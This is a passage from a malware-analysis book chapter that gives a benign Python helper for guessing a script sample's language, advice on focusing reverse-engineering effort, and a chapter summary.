  8. Often, it is easier to review the output of dynamic analysis tools and then switch to static analysis so that you have some basic understanding of at least part of the functionality. Employ dynamic analysis when you need to decrypt some important block of data or when you want to understand the logic behind some piece of code.
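
Step 1 can also be partly scripted. The following Python sketch checks the shebang line first and then falls back on a few content markers. The markers and their order are illustrative assumptions, so treat the result as a hint to confirm manually. guess_script_language is a hypothetical name:

```python
import re

# Illustrative hints only; a real triage would combine many more signals
SHEBANG_INTERPRETERS = {
    'sh': 'POSIX shell', 'bash': 'Bash', 'python': 'Python', 'perl': 'Perl',
    'ruby': 'Ruby', 'php': 'PHP', 'node': 'JavaScript (Node.js)',
}
CONTENT_HINTS = [  # checked in order; the first match wins
    (re.compile(r'<\?php', re.I), 'PHP'),
    (re.compile(r'^\s*@?echo\s+off\b', re.I | re.M), 'Windows batch'),
    (re.compile(r'\bnew\s+ActiveXObject\s*\(', re.I), 'JScript'),
    (re.compile(r'\bInvoke-Expression\b|\bNew-Object\b|\$env:', re.I), 'PowerShell'),
    (re.compile(r'\bCreateObject\s*\(', re.I), 'VBScript'),
]


def guess_script_language(data: bytes) -> str:
    text = data[:4096].decode('utf-8', errors='replace')
    lines = text.splitlines()
    first_line = lines[0].strip() if lines else ''
    if first_line.startswith('#!'):
        parts = first_line[2:].split()
        # '#!/usr/bin/env python3' names the interpreter in the second field
        if len(parts) > 1 and parts[0].endswith('/env'):
            parts = parts[1:]
        name = parts[0].rsplit('/', 1)[-1] if parts else ''
        base = re.sub(r'[\d.]+$', '', name)  # python3 -> python, perl5.30 -> perl
        return SHEBANG_INTERPRETERS.get(base, 'unknown interpreter: ' + name)
    for pattern, language in CONTENT_HINTS:
        if pattern.search(text):
            return language
    return 'unknown'
```

The order of CONTENT_HINTS matters. For example, JScript can also call WScript.CreateObject, so a JScript sample without ActiveXObject may be reported as VBScript.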

Once you can analyze code, the next important step will be figuring out what to focus on.

Questions to answer

Reverse engineering is not just an engineering task – often, it requires a certain amount of research and creativity to solve the corresponding challenges.

Usually, the analysis time is limited by circumstances. Therefore, pay particular attention to the functionality that will help answer the questions needed to complete the report. This part might be tricky because, without taking a look at everything, it is difficult to say whether the description is complete or not. Searching for the keywords of functions of interest and checking their references should be a good starting point. After this, it makes sense to check whether any block of code was encrypted, encoded, or loaded externally. Keeping your markup accurate will help you navigate the whole project and allow you to quickly come back later if necessary.

Summary

In this chapter, we covered multiple script languages and document macros that are often misused by attackers. We described the motivation behind a malware writer’s decision when they are choosing a particular approach. Additionally, we explored ready-to-use recipes on how to solve particular challenges specific to each language and summarized what functionality to pay attention to. You also gained a good understanding of various tools that will drastically help speed up analysis.

Finally, we covered generic approaches on how to handle malicious code written in virtually any script language that you may encounter. We also discussed the sequence of actions to follow to analyze malicious code efficiently.

After completing this chapter, you can now successfully perform static and dynamic analyses of various scripts, bypass anti-reversing techniques, and understand the core functionality of malware.

In Chapter 11, Dissecting Linux and IoT Malware, we will explore threats that target various Linux-based and IoT systems, learn how to analyze them, and then learn how to extend some of the knowledge you have gained from this chapter.
